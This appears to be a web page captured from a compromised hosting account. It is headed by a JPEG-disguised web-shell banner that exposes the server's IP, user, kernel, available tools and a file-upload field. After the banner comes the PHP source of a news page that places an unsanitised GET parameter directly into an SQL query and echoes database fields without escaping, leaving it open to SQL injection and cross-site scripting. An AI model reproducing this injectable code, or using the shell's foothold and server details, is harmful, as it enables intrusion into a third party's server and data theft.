ÿØÿà JPEG ÿþ;
| Server IP : 68.65.120.201 / Your IP : 216.73.216.221 Web Server : LiteSpeed System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : taxhyuvu ( 2294) PHP Version : 8.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /proc/self/root/proc/self/root/home/./././taxhyuvu/./././www/ |
Upload File : |
<?php
include_once('admin/db.php');
$id=$_GET['id'];
$ddc="SELECT * FROM `news` WHERE `id`=$id";
$daa=mysqli_query($con,$ddc);
$d=mysqli_fetch_assoc($daa);
$sel="SELECT * FROM `news` ORDER BY `id` Desc limit 0,10 ";
$data=mysqli_query($con,$sel);
include_once('head.php');
?>
<style>
.pak img{ width: 100%;
}
.pak h1{font-family: math;
font-weight: 900;
padding-top: 55px;color: #423f3f; text-align: justify;
font-size: 25px;}
.apa img{width: 100%;
height: 128px;}
.pak span { color: #423f3f;}
.pak p{ color: #423f3f;}
.apa h5{ font-family: math;
margin: 0px;
font-size: 21px;
text-align: justify;}
.apa{border: 0.5px solid #1c959e;
border-radius: 5px; margin-bottom:10px;}
.apa{color:#423f3f;}
*{font-family:Math; font-size:20px; }
</style>
<head>
<title><?php echo $d['heading']?></title>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="<?php echo $d['heading']?> <?php echo $d['key']?>">
<meta name="keywords" content="<?php echo $d['key']?>">
</head>
<body>
<div class="container pak" style="max-width: 90%;">
<div class="row" style="margin-bottom: 25px;">
<div class="col-md-8" style="padding: 0px 30px;">
<!-- <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6156506060173413"-->
<!-- crossorigin="anonymous"></script>-->
<!-- top ads for news -->
<!--<ins class="adsbygoogle"-->
<!-- style="display:block"-->
<!-- data-ad-client="ca-pub-6156506060173413"-->
<!-- data-ad-slot="6277274980"-->
<!-- data-ad-format="auto"-->
<!-- data-full-width-responsive="true"></ins>-->
<!--<script>-->
<!-- (adsbygoogle = window.adsbygoogle || []).push({});-->
<!--</script>-->
<h1><?php echo $d['heading']?> </h1>
<?php
$ddd=$d['eemail'];
$pagal="SELECT * FROM `adminsignup` WHERE `Email_Address` ='$ddd'";
$dddd= mysqli_query($con,$pagal);
$db=mysqli_fetch_assoc($dddd);
?>
| <span><I class="fa fa-calendar"></I> <?php echo $d['pdate']?> </span>
<img src="admin/<?php echo $d['img']?>" alt="">
<!-- <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6156506060173413"-->
<!-- crossorigin="anonymous"></script>-->
<!-- image ads down -->
<!--<ins class="adsbygoogle"-->
<!-- style="display:block"-->
<!-- data-ad-client="ca-pub-6156506060173413"-->
<!-- data-ad-slot="5726610643"-->
<!-- data-ad-format="auto"-->
<!-- data-full-width-responsive="true"></ins>-->
<!--<script>-->
<!-- (adsbygoogle = window.adsbygoogle || []).push({});-->
<!--</script>-->
<p><?php echo $d['text']?></p></div>
<div class="col-md-4"><br><br>
<?php foreach ($data as $v ) { ?>
<a href="news_detaill?id=<?php echo $v['id'];?> ">
<div class="row apa">
<div class="col-md-3" style="border-right: 0.5px solid #29959d3d; "><img src="admin/<?php echo $v['img']?>" alt=""></div>
<div class="col-md-9" style="
display: flex;
justify-content: center;
align-items: center;
" ><h5><?php echo $v['heading']?></h5></div>
</div></a>
<?php } ?>
</div>
</div>
</div>
</body>
</html>
<script>
/* Demo purposes only */
document.querySelectorAll(".projcard-description").forEach(function(box) {
$clamp(box, {
clamp: 6
});
});
</script>
<?php
include_once('footer.php');
?>